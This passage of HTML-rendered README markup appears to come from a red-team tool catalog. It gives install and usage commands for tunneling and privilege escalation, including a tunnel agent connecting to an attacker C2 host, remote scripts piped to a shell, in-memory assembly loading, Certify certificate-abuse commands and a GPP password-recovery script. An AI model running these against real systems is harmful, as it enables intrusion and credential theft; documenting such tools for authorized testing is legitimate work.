overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./agent -connect attacker_c2_server.com:11601\"\u003e\u003cpre\u003e./agent -connect attacker_c2_server.com:11601\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA session should appear on the proxy server.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"INFO[0102] Agent joined. name=nchatelain@nworkstation remote=\u0026quot;XX.XX.XX.XX:38000\u0026quot;\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eINFO[0102] Agent joined. name=nchatelain@nworkstation remote=\"XX.XX.XX.XX:38000\"\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eUse the session command to select the agent.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"ligolo-ng » session \n? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eligolo-ng » session \n? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/nicocha30/ligolo-ng#using-ligolo-ng\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/nicocha30/ligolo-ng#demo\"\u003ehttps://github.com/nicocha30/ligolo-ng#demo\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003ePrivilege Escalation\u003c/h1\u003e\u003ca id=\"user-content-privilege-escalation\" class=\"anchor\" aria-label=\"Permalink: Privilege Escalation\" href=\"#privilege-escalation\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/vu-ls/Crassus\"\u003eCrassus\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-crassus\" class=\"anchor\" aria-label=\"Permalink: 🔙Crassus\" href=\"#crassus\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\"Accenture made a tool called Spartacus, which finds DLL hijacking opportunities on Windows. Using Spartacus as a starting point, we created Crassus to extend Windows privilege escalation finding capabilities beyond simply looking for missing files. The ACLs used by files and directories of privileged processes can find more than just looking for missing files to achieve the goal.\" - \u003ca href=\"https://github.com/vu-ls/Crassus?tab=readme-ov-file#why-crassus\"\u003eLink\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Build)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCrassus was developed as a Visual Studio 2019 project. To build Crassus.exe:\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eOpen Crassus.sln\u003c/li\u003e\n\u003cli\u003ePress Ctrl+Shift+B on your keyboard\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (precompiled)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf you trust running other people's code without knowing what it does, Crassus.exe is \u003ca href=\"https://github.com/vu-ls/Crassus/blob/main/binaries/Crassus.exe\"\u003eprovided in this repository\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eIn \u003ca href=\"https://learn.microsoft.com/en-us/sysinternals/downloads/procmon\" rel=\"nofollow\"\u003eProcess Monitor\u003c/a\u003e, select the \u003ccode\u003eEnable Boot Logging\u003c/code\u003e option.\u003c/li\u003e\n\u003cli\u003eReboot.\u003c/li\u003e\n\u003cli\u003eOnce you have logged in and Windows has settled, optionally also run \u003ca href=\"https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c\"\u003escheduled tasks that may be configured to run with privileges\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eRun Process Monitor once again.\u003c/li\u003e\n\u003cli\u003eWhen prompted, save the boot log.\u003c/li\u003e\n\u003cli\u003eReset the default Process Monitor filter using \u003ccode\u003eCtrl-R\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eSave this log file, e.g., to \u003ccode\u003eboot.PML\u003c/code\u003e. The reason for re-saving the log file is twofold:\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eOlder versions of Process Monitor do not save boot logs as a single file.\u003c/li\u003e\n\u003cli\u003eBoot logs by default will be unfiltered, which may contain extra noise, such as a local-user DLL hijacking in the launching of of Process Monitor itself.\u003c/li\u003e\n\u003c/ol\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14\" alt=\"Crassus\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots\"\u003ehttps://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\"\u003eLinPEAS\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-linpeas\" class=\"anchor\" aria-label=\"Permalink: 🔙LinPEAS\" href=\"#linpeas\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl -L \u0026quot;https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh\u0026quot; | sh\"\u003e\u003cpre\u003ecurl -L \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS\"\u003eWinPEAS\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-winpeas\" class=\"anchor\" aria-label=\"Permalink: 🔙WinPEAS\" href=\"#winpeas\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest \u0026quot;https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe\u0026quot; -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main(\u0026quot;\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-smi\"\u003e$wp\u003c/span\u003e=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -UseBasicParsing \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Select-Object -ExpandProperty Content))\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e [winPEAS.Program]::Main(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/diego-treitos/linux-smart-enumeration\"\u003elinux-smart-enumeration\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-linux-smart-enumeration\" class=\"anchor\" aria-label=\"Permalink: 🔙linux-smart-enumeration\" href=\"#linux-smart-enumeration\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLinux smart enumeration is another good, less verbose, linux privesc tool for Linux.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl \u0026quot;https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh\u0026quot; -Lo lse.sh;chmod 700 lse.sh\"\u003e\u003cpre\u003ecurl \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -Lo lse.sh\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003echmod 700 lse.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/GhostPack/Certify\"\u003eCertify\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-certify\" class=\"anchor\" aria-label=\"Permalink: 🔙Certify\" href=\"#certify\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCertify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCertify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eKey features of Certify:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eCertificate creation\u003c/li\u003e\n\u003cli\u003eCertificate signing\u003c/li\u003e\n\u003cli\u003eCertificate import\u003c/li\u003e\n\u003cli\u003eCertificate trust modification\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCertify is compatible with \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e. Open the Certify project \u003ca href=\"https://github.com/GhostPack/Certify\"\u003e.sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Running Certify Through PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"[Convert]::ToBase64String([IO.File]::ReadAllBytes(\u0026quot;C:\\Temp\\Certify.exe\u0026quot;)) | Out-File -Encoding ASCII C:\\Temp\\Certify.txt\"\u003e\u003cpre\u003e[Convert]::ToBase64String([IO.File]::ReadAllBytes(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Temp\\Certify.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)) \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Out-File -Encoding ASCII C:\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eemp\u003cspan class=\"pl-cce\"\u003e\\C\u003c/span\u003eertify.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCertify can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the base64-encoded Certify assembly string):\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\u0026quot;aa...\u0026quot;))\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe Main() method and any arguments can then be invoked as follows:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"[Certify.Program]::Main(\u0026quot;find /vulnerable\u0026quot;.Split())\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e[Certify.Program]::Main(\"find /vulnerable\".Split())\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull compile instructions can be found \u003ca href=\"https://github.com/GhostPack/Certify#compile-instructions\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# See if there are any vulnerable templates\nCertify.exe find /vulnerable\n\n# Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal\nCertify.exe request /ca:dc.theshire.local\\theshire-DC-CA /template:VulnTemplate /altname:localadmin\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e See if there are any vulnerable templates\u003c/span\u003e\nCertify.exe find /vulnerable\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal\u003c/span\u003e\nCertify.exe request /ca:dc.theshire.local\u003cspan class=\"pl-cce\"\u003e\\t\u003c/span\u003eheshire-DC-CA /template:VulnTemplate /altname:localadmin\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull example walkthrough can be found \u003ca href=\"https://github.com/GhostPack/Certify#example-walkthrough\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1\"\u003eGet-GPPPassword\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-get-gpppassword\" class=\"anchor\" aria-label=\"Permalink: 🔙Get-GPPPassword\" href=\"#get-gpppassword\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGet-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eGet-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFollow the PowerSploit \u003ca href=\"https://github.com/A-poc/RedTeam-Tools#powersploit\"\u003einstallation 